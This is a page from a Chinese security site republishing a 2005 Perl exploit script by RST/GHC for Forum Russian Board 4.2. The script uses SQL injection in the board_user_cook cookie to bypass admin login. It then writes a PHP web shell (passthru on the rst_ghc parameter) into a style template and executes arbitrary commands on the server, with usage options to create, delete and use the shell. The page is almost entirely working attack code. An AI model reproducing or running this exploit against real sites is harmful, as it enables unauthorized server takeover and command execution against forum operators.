首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Forum Russian Board SQL Injection and Command Execution Exploit
来源:http://rst.void.ru 作者:1dt.w0lf 发布时间:2005-06-22  

Forum Russian Board SQL Injection and Command Execution Exploit

#!/usr/bin/perl

# Forum Russian Board 4.2 Full (FRB) (http://www.carline.ru , http://frb.ru)
# command execution exploit by RST/GHC (http://rst.void.ru , http://ghc.ru)
# bugs found by foster & 1dt.w0lf , xpl coded by 1dt.w0lf
# RST/GHC - http://rst.void.ru , http://ghc.ru

use IO::Socket;
use Getopt::Std;

getopts("h:p:u:i:c:");

$host = $opt_h;
$path = $opt_p;
$user = $opt_u;
$id = $opt_i;
$cmd = $opt_c || 'create';

$cmdspl = "%26%26"; # ; - for unix
# %26%26 - for windows

if(!$host || !$path) { usage(); }
if(($cmd eq 'create' || $cmd eq 'delete') && (!$user || !$id)) { usage(); }

$host =~ s/(http:\/\/)//g;
$cook = $user."' /*";

if($cmd eq 'create' || $cmd eq 'delete'){
head();
print ">>> CREATE SHELL\n" if ($cmd eq 'create');
print ">>> DELETE SHELL\n" if ($cmd eq 'delete');
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
PeerPort => "80") || die "[-] CONNECT FAILED\n";
print $sock "GET ${path}admin/style_edit.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
print $sock "Connection: close\n\n";
print "GETTING CURRENT STYLE ... [";
while ($res = <$sock>)
{
if($res =~ /(.*)<\/textarea>/) { $data .= $1; $p = 0; }
$data .= $res if $p;
if($res =~ s/(.*)(<textarea)([^<>]*)([>])(.*)/$5/) { $data .= $res; $p = 1; }
}

if(length($data)>0) { print " DONE ]\n"; }
else { print " FAILED ]\n"; exit(); }

if($data =~ /rst_ghc/)
{
if($cmd eq 'create') { print "SHELL ALREADY EXIST!"; exit(); }
if($cmd eq 'delete')
{
print "SHELL EXIST.\nDELETING SHELL.\n";
$data =~ s/\s*<\? if\(\$_GET\[rst_ghc\]\)\{ passthru\(\$_GET\[rst_ghc\]\); \} \?>//g;
}
}
else
{
if($cmd eq 'create')
{
$data .= "\n";
$data .= '<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>';
}
if($cmd eq 'delete') { print "SHELL NOT EXIST. CAN'T DELETE."; exit(); }
}

$data =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$post = "message=${data}&form_h=yes&style_edit_ok=%C8%E7%EC%E5%ED%E8%F2%FC";
print "CREATE NEW STYLE ...[";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80")
|| die "[-] CONNECT FAILED\r\n";
print $sock "POST ${path}admin/style_edit.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-length: ".length($post)."\n\n";
print $sock "$post";
print $sock "\n\n";
print " DONE ]\n";
if($cmd eq 'create') { print "SHELL CREATED SUCCESSFULLY! NOW YOU CAN TRY
EXECUTE COMMAND."; }
if($cmd eq 'delete') { print "SHELL DELETED!"; }
}
else
{
head();
print ">>> COMMAND EXECUTE\n";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80")
|| die "[-] CONNECT FAILED\n";
print $sock "GET ${path}index.php?rst_ghc=echo%20_START_%20$cmdspl%20$cmd%20$cmdspl
%20echo%20_END_%20; HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";

while ($res = <$sock>)
{
if($res =~ /^_END_/) { $p = 0; }
$data .= $res if $p;
if($res =~ /^_START_/) { $p = 1; }
}
if(length($data)>0) {
print "-----------------------------------------------------------------\n";
print $data;
print "-----------------------------------------------------------------\n";
exit(0);
}
else { print "[-] FAILED\nMaybe you forget create shell first?\n"; exit(0); }

}

sub usage()
{
head();
print " USAGE : r57frb.pl [options]\n\n";
print " Options: \n";
print " -h - host e.g. '127.0.0.1' , 'www.frb.ru'\n";
print " -p - path to forum e.g. '/frb/' , '/forum/'\n";
print " -u - admin username e.g. 'admin'\n";
print " -i - admin id e.g. '1'\n";
print " -c [create|delete|cmd]\n";
print " create - for create shell\n";
print " delete - for delete shell\n";
print " cmd - any command for execute\n";
print "-----------------------------------------------------------------\n";
exit(0);
}

sub head()
{
print "-----------------------------------------------------------------\n";
print "Forum Russian Board 4.0 Full command execution exploit by RST/GHC\n";
print "-----------------------------------------------------------------\n";
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Plug and Pla
·Mambo user_rating Parameter Re
·VERITAS NetBackup bpjava-msvc
·WordPress <= 1.5.1.1 cat_id
·VERITAS NetBackup bpjava-msvc
·Claroline E-Learning Applicati
·VERITAS NetBackup bpjava-msvc
·Ultimate PHP Board Password Ha
·Ethereal SLIMP3 Protocol Disse
·eXtropia WebStore Remote Comma
·XMail -t Command Line Option H
·PeerCast <= 0.1211 HTTP Req
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved